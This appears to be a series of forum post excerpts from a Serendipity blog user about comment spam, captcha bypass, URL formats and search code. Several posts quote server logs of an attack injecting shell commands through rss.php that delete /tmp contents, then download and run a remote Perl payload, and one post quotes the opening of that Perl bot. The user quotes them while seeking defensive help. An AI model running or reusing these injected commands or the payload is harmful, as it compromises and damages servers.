Ironically, this topic is receiving spam:

http://www.s9y.org/forums/viewtopic.php?t=387

I think the admins need to ban guest posting.

Also, if you look at the memberlist of this forum, there are several recent bogus accounts which link to spam websites. I had to deal with this in my forum, and I ...

I will change my settings to reject, but I am curious as to how they are circumventing the captcha system.

I found a couple more spams. Just POSTs from nowhere:
67.180.239.246 - - [07/May/2005:23:39:34 -0400] "POST /mike/archives/33-Argh,-Referer-sic-Spam.html HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; DT)"
212.123.26.115 - - [07/May/2005:23:39:58 -0400] "POST /mike ...

Over the past couple days I've been getting poker spam comments. While I have old entries set to require moderation and use the captchas, I'm not sure how they get through in the first place.

The most recent spam came tonight via a single POST...no GETs of the content or captcha files, at least not ...

Is there any easy way to tell web spiders like Googlebot to not index stuff like the captcha graphics?

I'm getting hit too.

Ann Elisabeth has been tracking these guys from her blog.
http://www.annelisabeth.com/blog/

She thinks they're in Bulgaria somewhere.

Anyway, I need a way to disable trackbacks! Deleteing them one by one is not practical.

The more I look at this stuff it looks like a worm to exploit the recent PHP flaws. Hopefully I'm alright with S9Y 0.7.1 and PHP 4.3.10.

One of the PHP "sess" files referenced in that mess of a URL contained this:


#!/usr/bin/perl

use LWP::Simple;
use IO::Socket::INET;




my $processo = "/usr/bin/httpd -DSSL";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE ...

Hmm...a similar hit on rss.php:

67.18.198.10 - - [26/Dec/2004:18:39:33 -0500] "GET /mike/rss.php?version=1.0&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;rm%20-rf%20*;
wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111 ...

I saw this in my web logfile today. Any idea what hole they're trying to exploit and if I'm vulnerable? I'm running S9Y 0.7.1 and PHP 4.3.10 on Linux.

209.126.164.246 - - [26/Dec/2004:18:20:53 -0500] "GET /mike/rss.php?version=atom0.3&rush=echo%20_START_%3B%20cd%20/tmp;rm%20-rf%20*;
wget ...

I got hit by this today too, nearly 20 comments posted already!

http://boonedocks.net/mike/index.php?/a ... iracy.html

Right now I'm blocking IPs in Apache, but they keep inventing new ones.

Is is easy to shorten the archive URLs that S9Y uses?

I'd prefer this:
http://boonedocks.net/mike/index.php?/archives/25_North_Fork_Edisto_River.html

To be this:
http://boonedocks.net/mike/index.php?/archives/25.html

Or:
http://boonedocks.net/mike/index.php?/25

If this is only possible by ...

In addition, the search term should probably first be broken into its component words, then tested for length. If I try to search for 'php net', Serendipity won't complain about the length of the search term, but it still won't return results (assuming the default MySQL settings).

I was working on making my own customized theme today, and I noticed this code in the default theme's layout.php:

if ( strlen($serendipity['GET']['searchTerm']) <= 3 ) {
echo SEARCH_TOO_SHORT;
break;
}
I understand that the default MySQL fulltext word size is 4 or more characters, but this is ...

I haven't been able to access s9y.org for several days now. What's up?